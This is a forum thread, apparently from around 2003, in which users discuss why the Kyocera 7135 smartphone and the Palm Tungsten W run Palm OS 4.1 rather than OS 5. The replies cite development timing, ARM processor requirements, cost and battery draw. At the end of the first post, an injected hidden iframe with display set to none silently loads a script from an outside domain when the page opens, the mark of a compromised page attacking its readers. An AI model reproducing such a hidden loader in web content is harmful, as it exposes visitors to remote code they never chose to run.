+ Reply to Thread

Why did Kyocera use OS4 instead of 5?

Palm OS5 vs OS4.1: High resolution vs low.

Why OS4.1?
    I have a question here for techies, why is it Palm has released the Tungsten W using OS4.1 with the low resolution screen instead of building it around OS5 and the high res screen?

Same question regarding the Kyocera 7135, why not use the better and more powerfull technology used on the Tungsten T?

Baffled...<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator
    as discussed before,

the 7135 has been in development for a couple of years, and the latest technology around at that time was OS4. OS 5 may have been in development but it was probably not ready for primetime when the 7135 was being developed...

Also, Kyocera Wireless is the one that has to update the customized for 7135 Operating System. Don't install the Palm OS 5.
    Last edited by LonghairSteve; 12-23-2003 at 03:06 AM.

Despite the fact it runs OS 4, the Tungsten W runs at high res (320 x 320 pixels). Wish the 7135 was the same, but on a 2.5" LCD suitable for a clamshell phone, we might need a magifying glass to see the icons and text at that res

Biggest reason for Kyo being OS are likely:
    1) been in development since pre-OS 5.
    2) cost- the ARM processor used for OS 5 devices costs more and would increase price of the phone.
    3) you can run web clipping apps in OS 4 but support for web clippings apps was dropped from OS 5.
    Editor in Chief
    www.mobiletechreview.com

I'm responsible for all the wireless devices at my corporation. I must say the 7135 has the best display on a Palm device.

When I open the same app on a Tungsten T2, m515, and a 7135 - the Kyocera wins hands down. I find the display is clearer and the screen in brighter.

It could be because the screen is smaller, but still having 20.20 vision I don't mind that

Doesn't OS5 require a different processor to run on - like the StrongARM ones at 200+ MHz ??? Is that part of the reason why OS4 was used on the 7135?? Or doesn't the processor matter???
    Michael

Originally posted by Michael Rye
    Doesn't OS5 require a different processor to run on - like the StrongARM ones at 200+ MHz ??? Is that part of the reason why OS4 was used on the 7135?? Or doesn't the processor matter???
    You are correct. OS5 requires the ARM processor. Developement for the 7135 was already well under way before OS5 was available.

Alan

Originally posted by alanb
    You are correct. OS5 requires the ARM processor. Developement for the 7135 was already well under way before OS5 was available.
    I suppose it still may have been considered? Anyone know how the ARM processor compares on power consumption? I would expect power to be a bit more of an issue in a smartphone than a pda. If you already have the phone rf section sucking a lot of juice you may want a processor that just "sips" -- form factor, weight, other constraints.

-Quick

Recall, the phone and color display are the biggest draining factor on the handset. I don't think the ARM processor would have made that much of a difference.

Originally posted by HoTSynC
    Recall, the phone and color display are the biggest draining factor on the handset. I don't think the ARM processor would have made that much of a difference.
    I agree that it seems more plausible that availability dates for software development and available 3rd party software may have driven the decision. On the other hand hardware guys design to a power budget. Its a matter of being over or under, not how much. All you beta testers should have contacts in there with the answer?

-Quick